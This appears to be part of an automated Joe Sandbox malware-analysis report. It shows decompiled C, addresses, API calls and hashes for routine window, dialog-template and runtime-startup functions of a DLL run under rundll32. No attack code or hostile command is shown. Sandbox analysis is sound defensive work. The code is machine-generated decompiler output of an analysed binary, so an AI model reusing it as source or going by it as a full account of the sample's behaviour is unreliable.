                                                                                                            • IsWindowVisible.USER32(?), ref: 1000E5AD
                                                                                                            • GetDesktopWindow.USER32 ref: 1000E5C0
                                                                                                            • GetWindowRect.USER32 ref: 1000E5D3
                                                                                                            • GetWindowRect.USER32 ref: 1000E5E0
                                                                                                              • Part of subcall function 1002036F: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,1000E721,?,?), ref: 1002038A
                                                                                                              • Part of subcall function 100203AD: ShowWindow.USER32(?,?,1000E72A,00000000,?,?), ref: 100203BA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$DesktopMoveShowVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3835705305-0
                                                                                                            • Opcode ID: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                                                            • Instruction ID: 525efb47f72b729c7b32d6b473f79529eff02a82a59350a91d8b9bca58045246
                                                                                                            • Opcode Fuzzy Hash: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                                                            • Instruction Fuzzy Hash: F351D875A0020AAFDB00DFA8DD84CAEB7BAFF48345B154459F646E7255CB31BE41CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1003078E Relevance: 6.1, APIs: 4, Instructions: 134COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E1003078E(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t76;
				int _t78;
				intOrPtr _t83;
				intOrPtr _t102;
				int _t116;
				void* _t124;
				void* _t128;
				intOrPtr _t133;
				void* _t135;
				void* _t139;

				_t135 = __edi;
				_t124 = __ecx;
				_t76 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t128 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t133 =  *((intOrPtr*)(__ecx + 0x8c));
				_t139 = 2;
				if(_t133 == 0xa) {
					L7:
					 *((intOrPtr*)(_t124 + 0x28)) =  *((intOrPtr*)(_t124 + 0x28)) + _t76;
					L9:
					_t78 =  *((intOrPtr*)(_t124 + 0x30)) -  *((intOrPtr*)(_t124 + 0x28));
					__eflags = _t78;
					L10:
					if(_t78 < 0) {
						_t78 = 0;
					}
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x68)))) + 0x134))( &_v12, _t78, _t139, _t135);
					GetWindowRect(GetDesktopWindow(),  &_v44);
					_t83 =  *((intOrPtr*)(_t124 + 0x8c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if(_t83 == 0xa || _t83 == 0xc) {
						_v28.left = _v28.right -  *((intOrPtr*)(_t124 + 0x60)) - _v12 +  *((intOrPtr*)(_t124 + 0x58));
						_v28.top =  *((intOrPtr*)(_t124 + 0x5c)) -  *((intOrPtr*)(_t124 + 0x64)) - _v8 + _v28.bottom;
						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t124 + 0x38)) =  *((intOrPtr*)(_t124 + 0x40)) - _v12;
							_t102 =  *((intOrPtr*)(_t124 + 0x44)) - _v8;
							__eflags = _t102;
							 *((intOrPtr*)(_t124 + 0x3c)) = _t102;
							 *(_t124 + 0x48) = _v28.left;
							 *((intOrPtr*)(_t124 + 0x4c)) = _v28.top;
						}
					} else {
						_v28.right =  *((intOrPtr*)(_t124 + 0x60)) -  *((intOrPtr*)(_t124 + 0x58)) + _v28.left + _v12;
						_v28.bottom =  *((intOrPtr*)(_t124 + 0x64)) -  *((intOrPtr*)(_t124 + 0x5c)) + _v28.top + _v8;
						_t116 = IntersectRect( &_v60,  &_v44,  &_v28);
						_t149 = _t116;
						if(_t116 != 0) {
							 *((intOrPtr*)(_t124 + 0x40)) =  *((intOrPtr*)(_t124 + 0x38)) + _v12;
							 *((intOrPtr*)(_t124 + 0x44)) =  *((intOrPtr*)(_t124 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t124 + 0x50)) = _v28.right;
							 *((intOrPtr*)(_t124 + 0x54)) = _v28.bottom;
						}
					}
					 *((intOrPtr*)(_t124 + 4)) = _a4;
					 *((intOrPtr*)(_t124 + 8)) = _a8;
					return E10030582(_t124, _t149, 0);
				}
				if(_t133 == 0xb) {
					__eflags = _t133 - 0xa;
					if(_t133 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t76;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t139 = 0x22;
					if(_t133 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t128;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t128;
					}
					_t78 =  *((intOrPtr*)(_t124 + 0x34)) -  *((intOrPtr*)(_t124 + 0x2c));
					goto L10;
				}
			}


















                                                                                                            0x1003078e
                                                                                                            0x10030798
                                                                                                            0x100307a0
                                                                                                            0x100307a6
                                                                                                            0x100307a8
                                                                                                            0x100307b3
                                                                                                            0x100307b4
                                                                                                            0x100307d8
                                                                                                            0x100307d8
                                                                                                            0x100307e0
                                                                                                            0x100307e3
                                                                                                            0x100307e3
                                                                                                            0x100307e6
                                                                                                            0x100307e8
                                                                                                            0x100307ea
                                                                                                            0x100307ea
                                                                                                            0x100307f8
                                                                                                            0x10030809
                                                                                                            0x1003080f
                                                                                                            0x1003081e
                                                                                                            0x1003081f
                                                                                                            0x10030820
                                                                                                            0x10030821
                                                                                                            0x10030823
                                                                                                            0x1003088a
                                                                                                            0x10030899
                                                                                                            0x100308ae
                                                                                                            0x100308b0
                                                                                                            0x100308b8
                                                                                                            0x100308be
                                                                                                            0x100308be
                                                                                                            0x100308c1
                                                                                                            0x100308c7
                                                                                                            0x100308cd
                                                                                                            0x100308cd
                                                                                                            0x1003082a
                                                                                                            0x10030836
                                                                                                            0x10030845
                                                                                                            0x10030854
                                                                                                            0x1003085a
                                                                                                            0x1003085c
                                                                                                            0x10030864
                                                                                                            0x1003086d
                                                                                                            0x10030873
                                                                                                            0x10030879
                                                                                                            0x10030879
                                                                                                            0x1003085c
                                                                                                            0x100308d3
                                                                                                            0x100308dd
                                                                                                            0x100308e8
                                                                                                            0x100308e8
                                                                                                            0x100307b9
                                                                                                            0x100307d3
                                                                                                            0x100307d6
                                                                                                            0x100307dd
                                                                                                            0x100307dd
                                                                                                            0x100307dd
                                                                                                            0x00000000
                                                                                                            0x100307dd
                                                                                                            0x00000000
                                                                                                            0x100307bb
                                                                                                            0x100307c0
                                                                                                            0x100307c1
                                                                                                            0x100307c8
                                                                                                            0x100307c8
                                                                                                            0x100307c8
                                                                                                            0x100307c3
                                                                                                            0x100307c3
                                                                                                            0x100307c3
                                                                                                            0x100307ce
                                                                                                            0x00000000
                                                                                                            0x100307ce

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$IntersectWindow$Desktop
                                                                                                            • String ID:
                                                                                                            • API String ID: 123605412-0
                                                                                                            • Opcode ID: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                                                            • Instruction ID: 610273ea94d3692e70733b76c969e3fbb3ef96a28992a3e324fe7b4179401a7e
                                                                                                            • Opcode Fuzzy Hash: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                                                            • Instruction Fuzzy Hash: D2516076A012099FCB45DFACC5D5A9E7BF8FF08355F148195E905EB20AE630E980CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10024838 Relevance: 6.1, APIs: 4, Instructions: 115stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10024838(void* __ebx, void** __ecx, void* __edi, void* __esi, char* _a4, short _a8) {
				intOrPtr _v8;
				short _v72;
				signed int _v76;
				signed int _v80;
				void** _v84;
				signed int _v88;
				intOrPtr _t52;
				short* _t65;
				void* _t74;
				short* _t81;
				void* _t86;
				char* _t92;
				signed int _t93;
				signed int* _t95;
				void** _t96;
				signed int _t101;
				signed int _t103;
				void* _t106;

				_t52 =  *0x1004c470; // 0x6edecb8c
				_v8 = _t52;
				_v84 = __ecx;
				if(__ecx[1] != 0) {
					_t95 = GlobalLock( *__ecx);
					_v80 = 0 | _t95[0] == 0x0000ffff;
					_v76 = E100246AB(_t95);
					_t101 = (0 | _v80 != 0x00000000) + (0 | _v80 != 0x00000000) + 1 << 1;
					_v88 = _t101;
					if(_v80 == 0) {
						 *_t95 =  *_t95 | 0x00000040;
					} else {
						_t95[3] = _t95[3] | 0x00000040;
					}
					if(lstrlenA(_a4) < 0x20) {
						_a4 = _t101 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v72, 0x20) * 2;
						_t65 = E1002472A(_t95);
						_t86 = 0;
						_t81 = _t65;
						if(_v76 != 0) {
							_t86 = _t101 + 2 + E100124FC(_t81 + _t101) * 2;
						}
						_t92 = _a4;
						_t31 = _t81 + 3; // 0x3
						_t33 = _t92 + 3; // 0x3
						_t67 = _t86 + _t31 & 0xfffffffc;
						_t103 = _t81 + _t33 & 0xfffffffc;
						_v76 = _t86 + _t31 & 0xfffffffc;
						if(_v80 == 0) {
							_t93 = _t95[2];
						} else {
							_t93 = _t95[4];
						}
						if(_a4 != _t86 && _t93 > 0) {
							E100118B0(_t103, _t67, _t95 - _t67 + _v84[1]);
							_t106 = _t106 + 0xc;
						}
						 *_t81 = _a8;
						E100118B0(_t81 + _v88,  &_v72, _a4 - _v88);
						_t96 = _v84;
						_t96[1] = _t96[1] + _t103 - _v76;
						GlobalUnlock( *_t96);
						_t96[2] = _t96[2] & 0x00000000;
						_t74 = 1;
					} else {
						_t74 = 0;
					}
				} else {
					_t74 = 0;
				}
				return E100117AE(_t74, _v8);
			}





















                                                                                                            0x1002483e
                                                                                                            0x10024849
                                                                                                            0x1002484c
                                                                                                            0x1002484f
                                                                                                            0x10024862
                                                                                                            0x10024870
                                                                                                            0x10024878
                                                                                                            0x1002488d
                                                                                                            0x1002488f
                                                                                                            0x10024892
                                                                                                            0x1002489a
                                                                                                            0x10024894
                                                                                                            0x10024894
                                                                                                            0x10024894
                                                                                                            0x100248a9
                                                                                                            0x100248c9
                                                                                                            0x100248cc
                                                                                                            0x100248d2
                                                                                                            0x100248d7
                                                                                                            0x100248d9
                                                                                                            0x100248e5
                                                                                                            0x100248e5
                                                                                                            0x100248e9
                                                                                                            0x100248ec
                                                                                                            0x100248f0
                                                                                                            0x100248f4
                                                                                                            0x100248f7
                                                                                                            0x100248fe
                                                                                                            0x10024901
                                                                                                            0x10024909
                                                                                                            0x10024903
                                                                                                            0x10024903
                                                                                                            0x10024903
                                                                                                            0x10024910
                                                                                                            0x10024922
                                                                                                            0x10024927
                                                                                                            0x10024927
                                                                                                            0x10024931
                                                                                                            0x10024941
                                                                                                            0x10024946
                                                                                                            0x10024951
                                                                                                            0x10024954
                                                                                                            0x1002495a
                                                                                                            0x10024960
                                                                                                            0x100248ab
                                                                                                            0x100248ab
                                                                                                            0x100248ab
                                                                                                            0x10024851
                                                                                                            0x10024851
                                                                                                            0x10024851
                                                                                                            0x1002496d

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalLocklstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1144527523-0
                                                                                                            • Opcode ID: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
                                                                                                            • Instruction ID: afb049e80b1b3f5565d5b3658fd79ee3861b352aa931f7b78d6a2774fdc8a605
                                                                                                            • Opcode Fuzzy Hash: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
                                                                                                            • Instruction Fuzzy Hash: 9341B632900219EFDB14DFB4D88589EBBB8FF44354B518229E815DB255EF70E995CB80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001119B Relevance: 6.1, APIs: 4, Instructions: 113threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E1001119B(void* __ebx, void* __ecx, void* __edi, long* _a8) {
				void* _v8;
				void* __esi;
				void* __ebp;
				long* _t9;
				long* _t11;
				long _t17;
				signed int _t25;
				long* _t33;
				long* _t36;
				long* _t38;
				long* _t39;
				long _t47;
				long _t50;
				void* _t52;
				long* _t53;
				struct _OSVERSIONINFOA* _t54;
				signed int _t56;
				struct _OSVERSIONINFOA* _t58;

				_t9 = _a8;
				if(_t9 != 1) {
					__eflags = _t9;
					if(_t9 != 0) {
						__eflags = _t9 - 2;
						if(__eflags != 0) {
							__eflags = _t9 - 3;
							if(_t9 == 3) {
								E10015355(0);
							}
							L27:
							_t11 = 1;
							__eflags = 1;
							L28:
							return _t11;
						}
						_push(0x8c);
						_push(1);
						_t53 = E1001382A(__ebx, __edi, _t52, __eflags);
						__eflags = _t53;
						if(_t53 == 0) {
							L24:
							_t11 = 0;
							goto L28;
						}
						__eflags =  *0x1004f5e4( *0x1004c848, _t53);
						_push(_t53);
						if(__eflags == 0) {
							E100107C8(__ebx, __edi, _t53, __eflags);
							goto L24;
						}
						E1001518A();
						_t17 = GetCurrentThreadId();
						_t53[1] = _t53[1] | 0xffffffff;
						 *_t53 = _t17;
						goto L27;
					}
					__eflags =  *0x1004f3c8 - _t9; // 0x0
					if(__eflags <= 0) {
						goto L24;
					}
					 *0x1004f3c8 =  *0x1004f3c8 - 1;
					__eflags =  *0x1004f41c - _t9; // 0x1
					if(__eflags == 0) {
						E10011F67();
					}
					E1001634A();
					E1001516D();
					E10013AD4();
					goto L27;
				}
				E10010B20(0x94, __ecx);
				_t54 = _t58;
				_t54->dwOSVersionInfoSize = 0x94;
				if(GetVersionExA(_t54) == 0) {
					goto L24;
				}
				_t47 = _t54->dwPlatformId;
				 *0x1004f3e0 = _t47;
				_t25 = _t54->dwMajorVersion;
				 *0x1004f3ec = _t25;
				_t50 = _t54->dwMinorVersion;
				 *0x1004f3f0 = _t50;
				_t56 = _t54->dwBuildNumber & 0x00007fff;
				 *0x1004f3e4 = _t56;
				if(_t47 != 2) {
					 *0x1004f3e4 = _t56 | 0x00008000;
				}
				 *0x1004f3e8 = (_t25 << 8) + _t50;
				if(E10013A83(1) != 0) {
					if(E10015384() != 0) {
						E1001678D(__eflags);
						 *0x10050cb0 = GetCommandLineA();
						 *0x1004f3cc = E1001666B();
						_t33 = E1001614C();
						__eflags = _t33;
						if(_t33 < 0) {
							L13:
							E1001516D();
							goto L6;
						}
						_t36 = E100165C9();
						__eflags = _t36;
						if(_t36 < 0) {
							L12:
							E1001634A();
							goto L13;
						}
						_t38 = E10016396();
						__eflags = _t38;
						if(_t38 < 0) {
							goto L12;
						}
						_t39 = E10011E29(0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L12;
						}
						 *0x1004f3c8 =  *0x1004f3c8 + 1;
						goto L27;
					}
					L6:
					E10013AD4();
				}
			}





















                                                                                                            0x1001119e
                                                                                                            0x100111a5
                                                                                                            0x1001128b
                                                                                                            0x1001128d
                                                                                                            0x100112bb
                                                                                                            0x100112be
                                                                                                            0x10011304
                                                                                                            0x10011307
                                                                                                            0x1001130b
                                                                                                            0x10011310
                                                                                                            0x10011311
                                                                                                            0x10011313
                                                                                                            0x10011313
                                                                                                            0x10011314
                                                                                                            0x10011319
                                                                                                            0x10011319
                                                                                                            0x100112c0
                                                                                                            0x100112c5
                                                                                                            0x100112cc
                                                                                                            0x100112ce
                                                                                                            0x100112d2
                                                                                                            0x10011300
                                                                                                            0x10011300
                                                                                                            0x00000000
                                                                                                            0x10011300
                                                                                                            0x100112e1
                                                                                                            0x100112e3
                                                                                                            0x100112e4
                                                                                                            0x100112fa
                                                                                                            0x00000000
                                                                                                            0x100112ff
                                                                                                            0x100112e6
                                                                                                            0x100112ec
                                                                                                            0x100112f2
                                                                                                            0x100112f6
                                                                                                            0x00000000
                                                                                                            0x100112f6
                                                                                                            0x1001128f
                                                                                                            0x10011295
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10011297
                                                                                                            0x1001129d
                                                                                                            0x100112a3
                                                                                                            0x100112a5
                                                                                                            0x100112a5
                                                                                                            0x100112aa
                                                                                                            0x100112af
                                                                                                            0x100112b4
                                                                                                            0x00000000
                                                                                                            0x100112b4
                                                                                                            0x100111b0
                                                                                                            0x100111b5
                                                                                                            0x100111b8
                                                                                                            0x100111c6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100111cc
                                                                                                            0x100111cf
                                                                                                            0x100111d5
                                                                                                            0x100111d8
                                                                                                            0x100111dd
                                                                                                            0x100111e0
                                                                                                            0x100111e9
                                                                                                            0x100111f2
                                                                                                            0x100111f8
                                                                                                            0x10011200
                                                                                                            0x10011200
                                                                                                            0x1001120d
                                                                                                            0x1001121a
                                                                                                            0x10011227
                                                                                                            0x10011233
                                                                                                            0x1001123e
                                                                                                            0x10011248
                                                                                                            0x1001124d
                                                                                                            0x10011252
                                                                                                            0x10011254
                                                                                                            0x10011284
                                                                                                            0x10011284
                                                                                                            0x00000000
                                                                                                            0x10011284
                                                                                                            0x10011256
                                                                                                            0x1001125b
                                                                                                            0x1001125d
                                                                                                            0x1001127f
                                                                                                            0x1001127f
                                                                                                            0x00000000
                                                                                                            0x1001127f
                                                                                                            0x1001125f
                                                                                                            0x10011264
                                                                                                            0x10011266
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001126a
                                                                                                            0x1001126f
                                                                                                            0x10011272
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10011274
                                                                                                            0x00000000
                                                                                                            0x10011274
                                                                                                            0x10011229
                                                                                                            0x10011229
                                                                                                            0x10011229

                                                                                                            APIs
                                                                                                            • GetVersionExA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100111BE
                                                                                                            • GetCommandLineA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10011238
                                                                                                              • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                                                              • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                                                              • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                                                              • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                                                              • Part of subcall function 1001666B: FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                                                              • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                                                              • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                                                            • FlsSetValue.KERNEL32(00000000,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100112DB
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 100112EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentStrings$ByteCharMultiWide$AllocateCommandCurrentFreeHeapLineThreadValueVersion__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 770256606-0
                                                                                                            • Opcode ID: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                                                            • Instruction ID: a119cf37508875902a7ac88b5959fce435ef45eee062e48075b7e26cf38889a7
                                                                                                            • Opcode Fuzzy Hash: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                                                            • Instruction Fuzzy Hash: 7D31F635904312DBF728DFB08D8669A77E4EF05792F10412EF860CE552EB30EAC08B61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10030582 Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E10030582(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __esi;
				void* __ebp;
				signed char _t60;
				signed char _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				intOrPtr _t83;
				void* _t91;

				_t91 = __eflags;
				_t76 = __ecx;
				_v24 = 1;
				_v20 = 1;
				_push(GetStockObject(0));
				_t83 = E1002934F();
				_v16 = _t83;
				_v8 = E10033F2F(_t83, _t91);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t83;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00000050;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L6:
							__eflags = _t65 & 0x00000050;
							if(__eflags == 0) {
								L9:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L6;
							}
						}
						_v12 = _v8;
					} else {
					}
				} else {
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				if(( *(_t76 + 0x75) & 0x000000f0) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t95 =  *(_t76 + 0x24);
				_t67 = _v8;
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E10033FCE( *((intOrPtr*)(_t76 + 0x84)), _t95,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				asm("movsd");
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}


















                                                                                                            0x10030582
                                                                                                            0x10030590
                                                                                                            0x10030592
                                                                                                            0x10030595
                                                                                                            0x1003059e
                                                                                                            0x100305a4
                                                                                                            0x100305a6
                                                                                                            0x100305ae
                                                                                                            0x100305b1
                                                                                                            0x100305b4
                                                                                                            0x100305be
                                                                                                            0x100305c5
                                                                                                            0x100305c8
                                                                                                            0x100305dc
                                                                                                            0x100305e2
                                                                                                            0x100305e5
                                                                                                            0x100305e8
                                                                                                            0x100305ea
                                                                                                            0x100305f2
                                                                                                            0x100305f2
                                                                                                            0x100305f5
                                                                                                            0x10030602
                                                                                                            0x100305f7
                                                                                                            0x100305f7
                                                                                                            0x100305fb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100305fb
                                                                                                            0x100305ec
                                                                                                            0x100305ec
                                                                                                            0x100305f0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100305f0
                                                                                                            0x10030608
                                                                                                            0x100305ca
                                                                                                            0x100305ca
                                                                                                            0x100305c0
                                                                                                            0x100305c0
                                                                                                            0x1003060e
                                                                                                            0x1003060f
                                                                                                            0x10030610
                                                                                                            0x10030611
                                                                                                            0x10030617
                                                                                                            0x10030619
                                                                                                            0x1003061c
                                                                                                            0x1003061c
                                                                                                            0x10030623
                                                                                                            0x1003062d
                                                                                                            0x1003062d
                                                                                                            0x10030633
                                                                                                            0x10030636
                                                                                                            0x10030639
                                                                                                            0x1003063b
                                                                                                            0x1003063b
                                                                                                            0x1003065c
                                                                                                            0x1003066a
                                                                                                            0x1003066b
                                                                                                            0x10030671
                                                                                                            0x10030672
                                                                                                            0x1003067a
                                                                                                            0x1003067b
                                                                                                            0x1003067e
                                                                                                            0x10030681
                                                                                                            0x10030686

                                                                                                            APIs
                                                                                                            • GetStockObject.GDI32(00000000), ref: 10030598
                                                                                                              • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                                                              • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                                                              • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                                                                                                            • String ID:
                                                                                                            • API String ID: 3923860780-0
